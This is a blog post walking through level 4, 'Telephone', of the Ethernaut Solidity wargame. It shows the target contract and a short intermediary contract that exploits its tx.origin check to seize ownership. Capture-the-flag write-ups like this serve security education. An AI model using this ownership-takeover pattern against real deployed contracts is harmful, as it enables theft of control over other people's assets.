DEV Community

Cover image for Ethernaut Hacks Level 4: Telephone
Naveen ⚡
Naveen ⚡

Posted on • Edited on

Ethernaut Hacks Level 4: Telephone

#solidity #ethereum #openzeppelin #smartcontract

This is the level 4 of Ethernaut game.

Pre-requisites

Hack

Given contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {

  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}
Enter fullscreen mode Exit fullscreen mode

player has to claim this contract's ownership.

Simple one. We'll make an intermediate contract (named IntermediateContract) with the same method changeOwner (or anything else -- name doesn't matter) on Remix. IntermediateContract's changeOwner will simply call Telephone contract's changeOwner.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface ITelephone {
  function changeOwner(address _owner) external;
}

contract IntermediateContract {
  function changeOwner(address _addr) public {
    ITelephone(_addr).changeOwner(msg.sender);
  }
}
Enter fullscreen mode Exit fullscreen mode

player will call IntermediateContract contract's changeOwner, which in turn will call Telephone's changeOwner with msg.sender (which is player) as param. In that case tx.origin is player and msg.sender is IntermediateContract's address. And since now tx.origin != msg.sender, player has claimed the ownership.

Done.

Learned something awesome? Consider starring the github repo 😄

and following me on twitter here 🙏

Top comments (0)